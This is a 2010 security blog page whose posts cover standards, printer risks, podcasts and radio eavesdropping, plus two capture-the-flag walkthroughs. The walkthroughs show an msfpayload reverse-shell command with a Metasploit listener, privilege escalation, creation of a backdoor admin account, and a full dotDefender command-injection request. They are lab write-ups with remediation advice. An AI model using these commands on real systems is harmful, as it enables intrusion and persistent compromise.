Friday, June 4, 2010

Why Can’t We All Just Get Along?

During a recent discussion at work, the benefits of a sound security program outside of the context of repelling malicious assaults came up. What would be the gain of a security program if there was no one attempting to break into a network? How would the role of security for Information Technology change? Would security careers come to a crashing halt?

To give the discussion a framework, the following parameters were agreed upon:

Suddenly everybody in the world is neither malicious nor unscrupulous.

While there is still competition in industry, it is driven only by the idea that each competitor in an industry will attempt to outperform their competition by creating better products at a lower cost, but there will be no espionage or market for trade secrets.

  1. Nobody is intentionally harming the network or systems, so there will be no worms, Trojans, or computer viruses.

  2. This is global, so as to remove the possibility of foreign attackers, military or otherwise.

  3. People would still be capable of errors and would have disagreements founded in misunderstanding, but these disagreements would be settled through mediation or court, or rock-paper-scissors.

We talked about this for a while, but had no way to quantify either side of the argument.

So in this world with “No bad guys, period.” what benefit would there be to a security program? What would be areas where things would remain the same? What would be able to be removed from a security program? What does this mean to how we look at security programs as they currently exist?

To make things simple I thought it would be easiest to measuring what percentages of change would occur in a recognized Information Security Management Standard, BS7799. This way I could determine what changes would occur to security programs more globally. By using a recognized standard I felt it would be more appropriate than what one company or another might find useful for their individualized needs.

The next step was to go through the standard and determine if its components would stay or go. To do this an audit checklist of the BS7799 by Val Thiagarajan, available through SANS, was used to concisely summarize the intent of the standard, as it’s directed questioning leads to each sections focus. The results, with the rationale used in determining each section decided fate, assuming this is a standards based program for a medium sized business, founded on the three principals of security; availability, integrity, and confidentiality, can be found here:


http://securestate.blogspot.com/1989/06/why-cant-we-all-just-get-along-table.html

By tallying up the results, albeit subjectively, it was found that even without “bad guys”, 77.95 percent of the BS7799 is still applicable. This bodes well for justification of a security program, even in a world free of bad guys. Unsurprisingly, based on the outlined framework in which the subject was approached, for a medium business, the dramatic swing away from confidentiality towards integrity and availability maintained the need of a security program. Availability and integrity are key to processing orders, a major factor in most businesses. What was surprising was the extent to which the standard approached these two areas, given the amount of emphasis typically seen in security postings on mitigating against attackers. It crystallized further during this process how underrepresented the principles of availability and integrity are in most security conversations, given their weight. I hear a lot of “What will you do if this box gets compromised?” and very little “What is your plan if your RAID array gets corrupted?” at the speaking engagements I go to. Without paying attention to these core concepts the program can get very lopsided.

Hopefully this will help lend perspective to anyone that a hacker hasn’t yet breached that there is a need for a sound security program. Furthermore, this will hopefully guide people towards looking into their business continuity programs to revisit how impactful their systems can be on cash coming in to their businesses, and how important it is to develop a security program with processes in place to ensure access to and/or with the foresight to recover these systems.

Even without bad guys security would play a vital role for Information Technology, though it may change its name to “Continuity Planning”.



Read more!

Wednesday, June 2, 2010

Part 1: Ignorance Amongst Us

Recently a study was released by Forrester Research Inc. titled “The Value of Corporate Secrets.” To summarize, it basically goes on to state that although most security programs are driven by compliance regulations, perhaps organizations need to do a better job of securing trade secrets since it has been shown that company secrets (trade secrets, strategic plans, etc) are more valuable then custodial data (i.e. PII, credit card numbers, government identifiers, etc). The full study is available at the below link:

http://www.rsa.com/products/DLP/ar/10844_5415_The_Value_of_Corporate_Secrets.pdf

This study originally caught my eye mainly because it was linked on Slashdot.com with the title “Compliance is Wasted Money, Study Finds.” After reading the study, I am not sure Forrester actually would agree with this statement as much as it is Slashdot’s own interpretation of the study. Forrester breaks down this study into five different sections which I will discuss in subsequent blogs. In this first blog post I will discuss the first section of the study, all leading to what I consider a fairly ignorant title to a study posted by Slashdot and most likely immature conclusions by Forrester.

Company Secrets Comprise Two-Thirds of the Value of Firm’s Information Portfolios

Forrester Finding: For this survey, we asked respondents to identify the five most valuable assets in their information portfolios out of 17 possible types of information ranging from sales forecasts to cardholder data. For purposes of simplicity, we constrained the maximum value to $1 million. On average, enterprises valued their top five assets at $2.7 million in aggregate. Significantly, two-thirds of the value comes from secrets, not custodial data.

My question to the above is what exactly did Forrester use as a control during this survey? In any scientific experiment, groups are treated EXACTLY alike except for the ONE variable being tested at a time. Since I am going to go ahead and assume that this survey took place across many different industries with varying levels of annual revenue and organizational structure and controls, there are too many variables to consider this number to be an accurate representation of the value of corporate assets based on Forrester’s research.

First, organizations vary in organizational structure. The study only says that it interviewed 305 different IT security decision makers. The only reason I bring this up is because in smaller organizations, perhaps the CEO acts as the IT security decision maker as opposed to larger organizations where a CSO might be granted those responsibilities. Asking a CSO and a CEO what their most critical assets are most times is going to result in different answers.

Secondly, did Forrester survey only those organizations which have good asset and data classification programs? This would be very hard for me to believe being that from my experience these types of programs are non-existent in smaller to mid-size organizations. So once again, assuming that Forrester was not able to survey just those organizations which have good asset and data classification programs, how could the person being interviewed actually give an accurate answer as to what their 5 most critical assets are and then proceed to place a dollar amount on them?

Finally, even if we assume this survey to be correct and two-thirds of the firm’s value is in their company secrets, what is not addressed is the potential impact other than a dollar amount that may be incurred by an organization if company secrets or custodial data is lost. Sometimes the reputational impact incurred after a breach is much more costly to an organization than the actual dollar amount of the data stolen. For example, I am much more likely to still do business with an organization whose financials were stolen as opposed to an organization who allowed my personal information to be compromised. So even though the theft of an organization’s financial statements might cost the organization more money, it may not result in the same reputational impact if custodial data was compromised. Many times the reputational impact can be much more costly than the monetary impact.

In summary, I believe there are simply way too many variables and not enough research done in order to truly determine what the value of assets are that compromise an organization’s portfolio. Even if we were to take this conclusion at face value, who cares about the value of the assets? The most important question to ask is the impact to the organization if sensitive assets were to be compromised.

Read more!

Thursday, May 27, 2010

So You’re Telling Me That You Did A Penetration Test And All You Found Was This Insecure Printer--LAME!!!

Printers, copiers, and fax machines have become more complex over the years. I find that this is largely due to a Dilbert comic strip character named “The Feature Creep” who would annoyingly want to cram more and more features into a new product line. These devices are doing more than what they were intended to do while opening additional security risks. Not only do these Multi-Function printers (MFP) scan, copy, fax and print, but now they can send email, host web-based administrative pages, and even tell you when the ink is low. One of the bigger risks that had been publicized in a recent CBS TV news broadcast is the fact that these devices are storing these image files on onboard hard drives. The news cast showcased some sensitive personal identifiable information (PII) and even sensitive investment reports of a high profile investment firm. Even though some of these security concerns may be trivial, these risks should be addressed.


PCI does not say I need to protect my printers; who cares?!

Compliance in many cases is one of the biggest drivers of security. Compliance with such standards/laws as PCI, HIPAA, Sarbanes Oxley, or state privacy laws, etc. may not exactly require you to secure your MFPs or other such devices, but that situation might be right around the corner. Since most organizations generally want to do the right thing, it may be required in certain situations to go beyond compliance. When news stories continually pop up covering the subject of sensitive information being breached by recycled copy machines, compliance may one day address these types of issues. Since compliance is just not at that point yet, here are some general questions to ask when trying to understand the criticality of these systems and to show some due diligence:

• Are these devices accessible on the network? If so, how is “Administrative” access controlled?
• How long are the image files retained on these systems?
• If the device was compromised, could the organization actually capture sensitive data?
• If a hard drive fails, does the replacement process follow the normal Standard for securely destroying the disk?
• What are some of the services enabled on these devices? Is there an administrative website, SNMP client, or SMTP server? How about the accounts and passwords of the administrative websites; are they set to default accounts and passwords?
If you answered “No” or “I don’t know” to these questions, some of the issues more than likely need to be addressed.

My vendors made me do it!

In many cases MFPs and other such devices are quickly configured and are plugged into a network. Normally these devices are not looked at or updated until it is time to get a new one. Unless during its life span it stopped working or started belching fire, additional settings were likely not addressed or disabled. Vendors try to sell these devices with more features while the customer may not have considered the risks involved. One example of these features is the ability to send faxes or scanned documents through email. This sounds like a good economical feature; however, internal policy may state that anonymous emails are strictly forbidden. Now that disgruntled employee has a way to send threatening or harassing emails through the printer to that one person he does not like. Additionally, in order to even securely wipe the internal hard drive on these devices, it may require voiding warranties or service contracts if the only way to securely wipe the hard drive is by totally dismantling the device. Some vendors are currently taking a proactive approach to implementing security features such as secure deletion of image files after a print job is finished; however, there really are no best practices currently developed for MFPs and other such devices.

Just like any network appliance, these MFPs and other print devices are small computers that have full-fledged web servers and are connected to the network. They have memory, storage, processors, and an operating system just like a router or a firewall. Even though these may not be directing critical network traffic or blocking unwanted packets, these devices can hold sensitive information. Before that old printer is finally decommissioned, ensure that the hard drive is securely wiped. When looking at your current devices or when the new one is purchased with all the cool features, check the settings. You may be surprised at what you find.

Read more!

Thursday, May 13, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through HSIYF

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for another challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.

Killthen00b
Ghost

After a quick portscan I chose to attack killthen00b purely based the available on the system offered. Ghost provided a HTTP port only. KilltheN00b had many open ports including FTP, HTTP and some various mail ports.


Scan output:
21/tcp open ftp
_ftp-anon: Anonymous FTP login allowed
25/tcp open smtp Surgemail smtpd 3.8k4-4
80/tcp open http Surgemail webmail (DNews based)
_html-title: SurgeMail Welcome Page
106/tcp open pop3pw Qualcomm poppassd (Maximum users connected)
110/tcp open pop3 SurgeMail pop3d 3.8k4-4
143/tcp open imap SurgeMail imapd 3.8k4-4
366/tcp open smtp Surgemail smtpd 3.8k4-4
465/tcp open tcpwrapped
587/tcp open smtp Surgemail smtpd 3.8k4-4
993/tcp open tcpwrapped
995/tcp open tcpwrapped
3389/tcp open ms-term-serv?
7025/tcp open tcpwrapped
7443/tcp open tcpwrapped



More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when times get rough



Initial FTP probing:

First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasn't much to play with in any available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail based on the response. So i decided to directly call the root directory with "cd c:".

Score!!

Cd C: correctly hopped me into a directory with loads of files available. I was also able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login the accessibility options would become a shell. But unfortunately I didn't have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.


HTTP:

Next I decided to hit up the web page located on KilltheN00b. The web server indicated an application by the name of "surgemail".

I then noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting... and a possible attack vector

Next I checked the exploit databases and verified an exploit for the version of surgemail running but the exploit was only valid for windows 2000 and 2003.



Debugging:

So I decided to check the remote desktop port in order to see what operating system was in use only to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work. This was a....


TOTAL FAIL


I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or possibly a newer operating systems protection mechanisms i only had control of certain parts of the stack, but no EIP overwrite. To be correct, rather partial overwrite of EIP. This exploit utilized a null byte value the OS already providing on the first byte of the 4 byte EIP, we can use the provided nullbyte to bypass failure on shellcode insertion. I thought this was neat (I like that) otherwise our null stop execution of the program prematurely.

Before going further with expliotation I realized this exploit was a post authentication exploit and would need a user account. grrrr


More Web:

I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106. The found login worked!!

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with more exploitation for a few hours.



Back to FTP:

Since I earlier noticed the EXE files had possible execution on the surge webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working correctly and after a few iterations this technique got me to the root directory. I then browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users 0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users 0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users 0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users 0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users 0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users 0 May 03 22:51 Python26
dr-xrwx--- 1 admin users 0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users 0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users 0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users 0 May 07 23:48 Users
dr-xrwx--- 1 admin users 0 May 03 21:28 Windows
-r--rr---- 1 admin users 24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users 10 Jun 10 2009 config.sys
-r--rr---- 1 admin users 2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users 12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into exploitation mode.







Meterpreter Evil.exe:

I now needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.142 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.6.142,LPORT=4444

Now I had a test payload to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe which apeared to be executed by the surgemail webpage.. Will the page execute my exe file?


Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!! Very important that all the bases are covered in information security..




Offensive Security in depth!!! or something like that.. (Wishful thinking)




So i started a multihandler for metasploit, just in case the reverseshell worked.

msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.6.142
LHOST => 192.168.6.142
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.142:4444
[*] Starting the payload handler...


I then proceeded to browse to the directory with all body parts crossed.....Hoping for a connect back to my listener.



SCORE!!!!!


My connection status in metasploit then indicated i had an open session. :)



Post Explotation:

With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of characters the LM hashes were blank. So I decided to just create my own user, via the following scenario.



Get higher privilages:

meterpreter > getsystem
...got system (via technique 1).



Add a new domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host 127.0.0.1
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host 127.0.0.1
[+] Successfully added user to local group


But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into rdesktop with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??



Get a Remote Desktop Gui:

meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host 127.0.0.1
[+] Successfully added user to local group

I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :) and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total. Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise








Lessons Learned:

-Don't listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!



Remediation:

-Check the ACL's and the Jails on your server logins and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines


Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG) nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..

Oliver Brown (Ficti0n)
Originally Posted on
http://console-cowboys.blogspot.com/



Up next: Part 3


Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!!








Read more!

Offensive Security n00bFilter Walk Through HSIYF


How Strong is Your FU hacker challenge



Target 1: N00bFilter

The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.





First Clue: Error Message





Like most pen tests your first inclination would be to post a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected sql error or perhaps invalid character. Upon further inspection of the error pages source code it was noted that this was an Applicure error message. Applicure being the vendor of Dot Defender, a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an ids/ips product andI started performing further probing of the application.





Annoyance: cool out periods

I then started trying default user/pass combinations such as admin/admin admin/password. Anything that a normal administrator would FAIL to implement changes to. This led me nowhere quickly at which time I started losing my connection to the application. After roughly 5 minutes i was back online and figured my Internet connection was foobarred... Got to love sketchy cable connections right?? I swear they do bandwidth limiting but whatever.. LOL A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me because I was was not running anything automated i was manually probing the application. The n00bfilter application also appeared to vary its cool outs based on what you were doing, messing with the URL, messing with the input fields, certain characters, some may be ok, others blocked me immediately, sometimes after only a few tries... Interesting the application has a personality apparently.


Thought: Dot Defender bypass

When I started getting owned by dot defender over and over again I started to think maybe I have to shut the WAF down or at least add my IP address to a list of friends within the dot defenders configurations. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...


Full Disclosure:

http://seclists.org/fulldisclosure/2009/Nov/357
The above link states that Post Authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials

Ok back to google, the google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece of information being that DotDefender site manager was located a /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name the struggle is half over right? so i tried all the default password combos and a few random passwords based on the site and the challenge.

FAIL


Dont Second Guess yourself:


Figuring that a vulnerability on full disclosure was not going to be the issue and especially being post auth on a n00bFilter I moved back to probing the app... I went at it for awhile with combination's of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me.. Attacks such as <scr><script>ipt> or other combination's using various
encoding techniques...

Again FAIL!!



Social Networking:


So I remember the hints said to stay in touch via twitter and IRC. I pop up the IRC channel and its a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better then to ask Muts a direct question, I already know the answer.. “TRY HARDER” this is offensive securities mantra which answers every inquiry. So instead I got some redbull and thought it over for a few and noticed that the IRC channel said the passwords were now reset to the original values.



Dot Defender again:


Knowing that the only password not behind dot defenders tyrannical rule was the basic auth login for dot defender, i gave Dot Defender a second go. The very first combination I tried popped open the application with the password of “password” and a # symbol at the end of the index page value, someone had suggested I try the # earlier.



Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from full disclosure.. :)





Post Auth:

Opening up Burp Proxy a well known application proxy I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in burp by the name of “repeater”, repeater allows you to keep making the request over and over again manually manipulating the values. Since I had an example delete request and I had the delete example on the full disclosure vulnerability, I modified my request with the vulnerable values.


POST /dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137


sitename=testsite&deletesitename=testsite;id;ls -al;
pwd;&action=deletesite&linenum=12


In the web response was the output of my command injection. I injected an “ls” command which in unix lists the contents of a directory. I thought to myself, ok so that’s cool but I need to find a certain file to show that I passed the challenge. Running burp requests looking for this file is waaaaay to tedious for me. So I used another familiar unix command. The “find” command.

sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12


Score:

The n00bSecret file was found quickly so I used the “cat” command to list out the contents of the file with the proof of passing the first challenge.


Request:

sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12


Response:

9f9b0b7d2db411c10b517b547a8693d831d3aa936aba4d54b51d30b5a182c05b1f7a5759fd7d5ef64e5485e5d3e3a214dd6b4b78a733566556b2887a6b9a6299


I browsed out to the contest scoreboard page and added in my shiny new proof key immediately since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!



Mexican food:

At this point I decided it was time for some Mexican food, I was fiendish for some chips and salsa all day long. I passed the n00b challenge being the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled till 24 hours after this point.. :) Not too horrible but again could be much better!!


Lessons Learned:


Dont second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with and try things more than once! Attacks that failed once might just work the second time... At this point 5 hours of the competition was wasted on an attack that should have taken me less than 2 hours. Or even 30 min if I was quick with it.


Dot Defender Remediation:


There is a patch available for this vulnerability from Applicure, just patch your app!! Also according to this other post by Applicure it only effects Linux running Apache. Response by Applicure in the link below.
http://seclists.org/bugtraq/2009/Dec/123

Oliver Brown (Ficti0n)
Originally Posted on
http://console-cowboys.blogspot.com/

Next up, how to own killthen00b


Read more!

Friday, May 7, 2010

Two Thumbs Up for These Security Podcasts

It may be cliché but security is an ever-changing world. I am often asked how I keep up to date on the latest security trends and news in this rapidly changing world. The two primary tools I use to do this are security podcasts and Twitter. Being a consultant I spend a lot of time on the road and have long periods of free time while driving or flying to clients’ sites. While on the road, or during my daily commute, I fill those open hours by listening to podcasts. I am going to discuss the security podcasts I listen to, with a short description of each one. In a future post I’ll discuss how I use Twitter to keep in touch with the security community and stay on top of emerging trends.

ASIS Security Management Podcast is a monthly podcast containing highlights from the ASIS Security Management magazine. The magazine and podcast tend to be heavily focused on physical security, but there is some information security mixed in also. This is a great podcast if you want to learn more about physical security.

Crypto-Gram Security Podcast is simply Bruce Schneier’s monthly Crypto-Gram newsletter read aloud by Dan Henage. If you don’t have time to read the printed version of Crypto-Gram, this is a great way to keep up to date on a fascinating newsletter. If you haven’t read the Crypto-Gram newsletter you owe it to yourself to check out this podcast. I leave every podcast thinking about a security problem or issue in a new way.

CyberSpeak is a podcast focused on forensics. It is hosted by two formal federal agents who have spent their careers doing data forensics work. This show covers everything from basic to cutting edge forensic techniques. Whether you are a novice in forensics or an experienced forensics examiner, you will learn something from each episode.

Eurotrash Security Podcast comes to us from a band of security professionals and hackers based in Europe. This is one of the few podcasts that covers information security from a European point of view, so it is curious to see how security concerns over there line up and differ from the concerns in the States.

Exotic Liability Podcast is often offensive, usually informative, but always a fun time. This podcast is definitely not safe for work. So be careful where you listen to it. I recommend skipping this podcast if you are offended at obscene language and concepts. Topics usually focus on penetration testing and social engineering. The hosts also have some entertaining war stories about penetration testing.

OWASP Security Podcast focuses on all aspects of web application security. Many of the episodes are short interviews with experts in this field. This podcast is a wonderful way to learn about or keep on top of web application security topics.

Network Security Podcast is a weekly security news podcast covering new stories from the previous week. This show covers all aspects of security. The hosts comment on the news stories, often adding insight which makes the program well worth the listen.

PaulDotCom Security Weekly focuses on the technical side of security. Shows usually include a technical segment, new stories from the previous week, and interviews with special guests. If you want to learn more about the technical side of security this is a podcast you must check out. They also provide very detailed show notes which can be helpful when trying to implement an attack discussed on the show. An episode of PaulDotCom Security Weekly often is broken into two parts and the entire weekly show usually runs two to three hours. If I am running short on podcast time in a week, I also will use the show notes to determine what topics are of interest so I can fast forward to that portion of the podcast.

Risky Business is a news show which focuses on security from down under. The host of the show, Patrick Gray, does a very good job of explaining security concepts and concerns. Patrick also has a good handle on the importance of balancing security with business requirements, something many security folks forget. Because of these two factors, this is a great show for someone just getting into security.

SANS Audio Cast is a short weekly newscast produced by SANS. Episodes tend to be ten to fifteen minutes long so it is a great way to quickly catch up on the hot security news from the previous week. Even if I am running behind on podcasts, I try to listen to this one the week it is released while the information is still fresh.

SecuraBit Podcast is a security news podcast that focuses on technical security topics. I mainly listen to SecuraBit for the special guests they have, who tend to be big names in the security community.

Security Justice is hands down the best security podcast ever made. This monthly podcast covers a variety of security topics but tends to lean more toward physical security and the convergence of physical and logical security. This also is the only security podcast recorded live in a bar. Because this podcast is recorded in a bar, expect bar like language that may not be safe for work. Also in the interest of full disclosure, I should state the author of this post is also a co-host on this show so his views of the show are most likely biased.

Social Media Security Podcast focuses on the security concerns related to social media sites such as Facebook, Twitter, MySpace, and LinkedIn. The team that runs socialmediasecurity.com hosts the show. This podcast is a great way to learn about the threats in the emerging area of social media. The show also provides great case studies and stories that can be used for end user education and awareness training.

Social-Engineering.org Podcast is a monthly podcast focusing on social engineering. Produced by the team that run social-engineering.org, the podcast covers a number of topics related to social engineering. This podcast brings in some amazing guests. At first the guest’s or show topic’s relationship to social engineering might not be clear, but hang in there and the team always ties in how they relate. At its roots this podcast is about how to influence people, which is an important skill for any security professional to have. So even if you are not interested in social engineering, I still recommend you check out a few episodes of this podcast.

The Southern Fried Security Podcast looks at security from the CSO and management level, which is a welcome change from the often technical-heavy security podcasts. The podcast focuses on integrating security into a business and the importance of balancing the business needs with security. Most security professionals have a hard time achieving this balance, so do your self a favor and listen to at least a few episodes of this podcast.

If any of these podcasts sound interesting to you, I recommend you download a few episodes and give them a listen.

What security podcasts do you listen to? Any podcast you think I should start listening to? If so, tell me why in the comments.


Read more!

Thursday, April 29, 2010

"All Your 900 MHz Are Belong to Us"

If you were asked, “Does your organization use unencrypted wireless communications?”, what would your answer be? Responses may include ones such as “We don’t utilize wireless networks,” or “Our cell phones are our only wireless devices.” These answers may be somewhat true; however, many organizations may not have thought completely about their answer and assets. More specifically, the 900 MHz frequency range comes to mind. The 900 MHz frequency range is used by many common devices yet is often utilized in an unsecure manner for corporate use.

In short, the 900 MHz frequency range is an attacker’s playground. There is so much information that can be gleaned from playing in this space of which many folks are unaware. Two-way radios, simple wireless communication devices, and other items are more common than one might think that utilize this common and open communication channel. I’ll examine two cases in which SecureState engineers were able to obtain valuable information via trivial methods during both physical penetration tests and social engineering exercises.

First, SecureState was hired to perform work for a casino in the United States. Engineers were staying at a hotel approximately 3 or 4 miles away from the casino. From the hotel, a simple ham radio was used to listen to the 900 MHz frequency range and eavesdrop on the radio conversations of casino guards. From this, one could identify when guard shift changes occurred, when large sums of money were being transported, their origination, and destination as well. It doesn’t take a rocket scientist to explain why this is an issue. Other, more sophisticated attacks could be carried out using this information. With a sub $100 radio readily available at your neighborhood Radio Shack, the 900MHz frequency range may be capable of being used to listen in on your organization’s unencrypted communication.

Second, SecureState again fired up a ham radio to perform reconnaissance for a physical penetration test on a financial institution. Upon perusing the 900 MHz frequency range, it was identified that unencrypted wireless telephone headsets were being used in the helpdesk area. From this, SecureState was able to listen to password reset calls, and other issues being addressed at the target financial institution. There is no question why this is an issue, and this isn’t the end of it. Better yet, even after the phone call ends and the headset is put back in its cradle to charge when not in use, it acts as a bug in the office. The headset still transmits despite not being on a call. This means that all conversation in the helpdesk area, even while not on a telephone call, can be eavesdropped upon! Two solutions to this potential exposure are using the Plantronics CS55 and CS70 digital headset models. They both digitally encode and encrypt the audio and transmit it using TDMA technology. These headsets will provide sufficient protection against wireless headset eavesdropping. As best practice, it also is recommended that executives and executives’ assistants do not use wireless headsets for sensitive communications.

With those two simple case studies, it is clear that with less than $100 of readily accessible equipment, your organization may be vulnerable to such eavesdropping. Perhaps in your organization’s regular 802.11 wireless network enumeration looking for rogue access points, the 900 MHz frequency range should be included as well.

Read more!